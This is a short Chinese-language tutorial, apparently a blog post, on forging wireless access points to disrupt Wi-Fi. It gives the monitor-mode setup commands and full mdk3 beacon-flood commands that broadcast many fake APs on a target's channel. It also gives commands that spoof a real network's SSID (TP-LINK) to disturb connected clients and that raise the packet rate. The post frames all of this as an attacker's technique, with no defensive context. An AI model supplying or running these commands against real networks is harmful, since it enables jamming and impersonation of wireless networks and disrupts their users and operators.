伪造无线AP的几种方法

伪造AP攻击的方法具体表现有很多,这里演示伪造合法AP和恶意创建大量虚假AP信号。

伪造大量虚假AP信号:

如果目的是要干扰正常无线通信,那么无线黑客也可以通过创建大量虚假AP基站信号来实现。

具体可以使用MDK3这款工具实现,KaliLinux里面可以通过无线网卡发射随机伪造的AP信号,并可以根据需要设定伪造的AP的工作频道,一般设定为干扰目标AP的同一频道。

具体命令如下:

mdk3   网卡  b   -g   -c   6  -h   7

参数解释:

网卡:此处用于输入当前的网卡的名称,这里是mon0

b:用于伪造啊P时使用的模式

-g:伪造成提供54M即满足802.11g标准的无线网络。

-c:num针对的无线工作频道,这里是6.

-h:num用于提升攻击效率,不过只针对个别无线设备有效,可以不使用该参数。


激活网卡命令:ifconfig wlan0 down

iwconfig wlan0 mode monitor

ifconfig wlan0 up

airmon-ng start wlan0


对于在某一频道正常工作的无线接入点,攻击者除了可以发送相同频道外,甚至还可以发送相同SSID的无线数据流量信号,来扰乱连接该AP的无线客户端的正常运作,具体命令如下:

mdk3  网卡  b   -n    TP-LINK   -g   -c    6

其中,-n  是SSID使用指定的SSID来替代随机生成的SSID,该参数使得提供更有针对性。

提升发包速度:

mdk3    网卡   b   -n   TP-LINK  -g   -c   6  -s 200

其中,-s为发送数据包速率,但并不准确,这里输入的为200,实际发包速率会保持在150---250个包/秒


你可能感兴趣的:(安全)